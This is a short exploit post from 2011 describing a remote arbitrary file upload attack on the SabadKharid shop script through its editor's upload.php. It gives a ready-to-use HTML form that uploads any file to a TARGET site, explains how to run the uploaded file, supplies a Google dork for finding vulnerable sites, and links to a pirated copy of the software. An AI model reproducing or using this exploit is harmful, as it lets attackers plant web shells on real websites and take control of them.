Home / exploits SabadKharid Shell Upload
Posted on 30 September 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Author : St493r [#] Contact : St493r@gmail.com [#] Title : SabadKharid Remote Arbitrary File Upload Exploit [#] Vendor : http://sabadkharid.com [#] Software : http://dl.p30vel.ir/scripts/sabadkharid-professional-nulled-p30vel.zip [#] Tested On : Linux [#] Date : 28 - 09 - 2011 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php [#] Exploit : Exploit.html <strong>SabadKharid Remote Arbitrary File Upload Exploit</strong> <form enctype="multipart/form-data" action=" http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> <input name="NewFile" type="file"> <input type="submit" value="submit"> </form> You can execute your uploaded file from : http://TARGET/userfiles/yourfile You can upload any file with any suffic Google dork : Powered by Sabadkharid , inurl:"index.php?register" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Thanks To All Iranian Hackers +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
